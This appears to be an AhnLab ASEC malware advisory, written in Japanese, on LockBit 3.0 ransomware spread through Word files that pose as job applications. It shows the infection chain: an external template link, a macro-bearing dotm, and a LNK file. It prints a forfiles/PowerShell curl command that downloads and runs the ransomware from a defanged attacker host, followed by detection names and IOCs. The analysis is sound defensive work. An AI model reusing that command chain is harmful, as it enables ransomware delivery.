ASEC 分析チームは入社志望に偽装したメールで拡散している NSIS 形式の LockBit 3.0 ランサムウェアが Word ドキュメント形式でも拡散していることを確認した。正確な配布経路は確認されていないが、配布ファイル名に「イム・ギュミン.docx」、「ジョン・チェリン.docx」等の、人名を使用していることからして、以前と同じくエントリーシートを装って配布されたものと推定される。
確認された Word ドキュメント内部の word\_rels\settings.xml.rels ファイルには External リンクが存在する。これによって、ドキュメントファイルを開くと hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm に接続し、さらなる dotm ファイルをダウンロードする。


ドキュメントファイル内部にはマクロの使用を誘導する画像が存在する。ダウンロードされた dlx5rc.dotm には VBA マクロが含まれており、ユーザーがコンテンツの有効化ボタンをクリックすると不正なマクロが実行される。


dotm ファイルに存在する VBA マクロコードは以下の通りである。

コード内部の文字列は難読化されており、CLSID(72C24DD5-D70A-438B-8A42-98424B88AFB8)を使用していることが特徴である。VBA マクロが実行されると C:\Users\Public\ フォルダーに skeml.lnk ファイルを生成する。このリンクファイルの TargetPath は forfiles.exe であり、rundll32.exe を通じて実行される。リンクファイルを実行するコマンドは以下の通りである。
- rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk
リンクファイルを実行すると、PowerShell コマンドを通じて hxxp://ppaauuaa11232[.]cc/aaa.exe からさらなる不正なファイルをダウンロードし、C:\Users\Public\156498415616651651984561561658456.exe として保存および実行する。LNK ファイルによって実行されるコマンドは以下の通りである。
- forfiles.exe /p c:\windows\system32 /m notepad.exe /c “”cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe”

現在ダウンロードできる 156498415616651651984561561658456.exe ファイルは、 NSIS 形式の LockBit 3.0 ランサムウェアである。

最近、LockBit ランサムウェアが様々な方式で拡散しており、ユーザーの注意が必要である。使用しているアプリケーションおよび V3 を最新バージョンにアップデートして使用するようにし、出どころが不明なドキュメントファイルは開かないようにしなければならない。
[ファイル検知]
Downloader/DOC.External
Downloader/XML.External
Downloader/LNK.Powershell
Ransomware/Win.LockBit
[ビヘイビア検知]
Malware/MDP.Download.M1197
Execution/MDP.Powershell.M1201
Ransom/MDP.Decoy.M1171
[IOC 情報]
2d8b6275dee02ea4ed218ba2673b834e (docx)
97c07d03556ddcfc8ebfa462df546eb5 (docx)
45dfdde3df07b6ccc23b7ae6e3dc1212 (docx)
77c5fb080bf77f099c5b5f268dcf4435 (dotm)
738bee5280d512a238c3bb48c3278f63 (lnk)
7b74e4fb9a95f41d5d9b4a71a5fe40b9 (exe)
hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm
hxxp://ppaauuaa11232[.]cc/aaa.exe
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報